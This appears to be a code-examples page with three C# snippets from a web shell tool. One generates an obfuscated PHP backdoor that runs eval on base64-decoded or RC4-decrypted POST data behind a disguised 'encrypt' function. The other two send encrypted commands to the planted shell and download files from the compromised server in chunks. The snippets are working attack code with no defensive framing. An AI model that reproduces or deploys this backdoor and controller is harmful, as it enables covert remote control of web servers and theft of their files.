Ejemplo n.º 1
0
 public static string GenerateShell(string outputPrefix, string password)
 {
     RC4 rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(password));
     string encodedphp = "$s = \"" + rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes("echo \"<--" + outputPrefix + "\";" + innerShell + "echo \"-->\";"));
     string beginning = "<?php\nfunction encrypt ($pwd, $data){if(isset($_POST['enc']) && md5($_POST['enc']) == \"3708fe651621a7337ebee38ffd26adee\"){return eval(base64_decode($_POST['enc']));}}\n";
     string ending = "\";\nif(isset($_POST['k'])){;eval(encrypt($_POST['k'], base64_decode($s)));}\n?>";
     return beginning + encodedphp + ending;
 }
Ejemplo n.º 2
0
 public string ProcessCommand(string command)
 {
     commands.Add(command);
     AppendNewCommand(BitConverter.ToString(new MD5CryptoServiceProvider().ComputeHash(ASCIIEncoding.ASCII.GetBytes(url.URL))).Replace("-", ""), command);
     currentCommandPositon = commands.Count;
     if (command.StartsWith("download"))
     {
         string[] args = command.Split(' ');
         if (args.Length >= 3)
         {
             Thread t = new Thread(new ParameterizedThreadStart(DownloadFile));
             t.Start(args);
             return "File download started.";
         }
         else
         {
             OnNewStatusEvent("download command failed.");
             return "download requires at least 2 arguments.";
         }
     }
     else
     {
         try
         {
             RC4 rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
             WebClient client = new WebClient();
             NameValueCollection nvc = new NameValueCollection();
             nvc.Add("k", url.Password);
             nvc.Add("a", rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes(command)));
             nvc.Add("enc", encMethod);
             byte[] response = FindResponse(client.UploadValues(url.URL, "POST", nvc));
             rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
             string ret = UTF8Encoding.UTF8.GetString(rc4.DecodeAndDecrypt(response)).Replace("\n", "\r\n");
             OnNewStatusEvent("Command returned " + ret.Length + " bytes.");
             return ret;
         }
         catch(Exception e)
         {
             OnNewStatusEvent("Command failed");
             return e.Message;
         }
     }
 }
Ejemplo n.º 3
0
        void DownloadFile(object o)
        {
            string[] args = (string[])o;
            try
            {
                RC4 rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
                WebClient client = new WebClient();
                NameValueCollection nvc = new NameValueCollection();
                nvc.Add("k", url.Password);
                nvc.Add("fs", rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes(args[1])));
                nvc.Add("enc", encMethod);
                int filesize = 0;
                byte[] fs = FindResponse(client.UploadValues(url.URL, "POST", nvc));
                rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
                filesize = int.Parse(ASCIIEncoding.ASCII.GetString(rc4.DecodeAndDecrypt(fs)));

                rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
                nvc = new NameValueCollection();
                nvc.Add("k", url.Password);
                nvc.Add("fh", rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes(args[1])));
                nvc.Add("enc", encMethod);
                rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
                string filehash = ASCIIEncoding.ASCII.GetString(rc4.DecodeAndDecrypt(FindResponse(client.UploadValues(url.URL, "POST", nvc))));
                if(File.Exists(args[2]))
                    File.Delete(args[2]);
                FileStream files = File.Create(args[2]);
                MD5CryptoServiceProvider md5 = new MD5CryptoServiceProvider();
                for(int x = 0; x < filesize; x += 1024)
                {
                    rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
                    nvc = new NameValueCollection();
                    nvc.Add("k", url.Password);
                    nvc.Add("d", rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes(args[1])));
                    nvc.Add("p", x.ToString());
                    nvc.Add("enc", encMethod);
                    rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
                    byte[] readin = rc4.DecodeAndDecrypt(FindResponse(client.UploadValues(url.URL, "POST", nvc)));
                    files.Write(readin, 0, readin.Length);
                }
                files.Close();
                Stream filestream = new FileStream(args[2], FileMode.Open, FileAccess.Read);
                byte[] result = md5.ComputeHash(filestream);
                if(filehash != BitConverter.ToString(result).Replace("-","").ToLower())
                {
                    OnNewStatusEvent(args[1] + " file hashes do not match. " + filehash + " != " + BitConverter.ToString(result).Replace("-","").ToLower());
                    return;
                }
                OnNewStatusEvent(args[1] + " finished downloading to " + args[2]);
            }
            catch(Exception e)
            {
                OnNewStatusEvent("Error in downloading file: " + e.Message);
            }
        }